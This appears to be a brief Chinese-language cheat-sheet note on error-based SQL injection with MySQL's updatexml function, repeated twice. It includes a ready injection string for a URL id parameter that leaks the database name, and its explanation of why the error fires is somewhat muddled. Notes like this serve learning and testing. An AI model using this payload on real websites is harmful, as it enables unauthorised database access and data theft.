使用updatexml 函数
updatexml (目标文件,文件路径,更改内容)
第一个参数错误,执行第二个参数,从而将第二个参数里面的sql 语句执行结果返回
?id =1 ' and updatexml (c,concat(0x7e,(select database()),0x7e),2) --+
0x7e 分割符号
使用updatexml 函数
updatexml (目标文件,文件路径,更改内容)
第一个参数错误,执行第二个参数,从而将第二个参数里面的sql 语句执行结果返回
?id =1 ' and updatexml (c,concat(0x7e,(select database()),0x7e),2) --+
0x7e 分割符号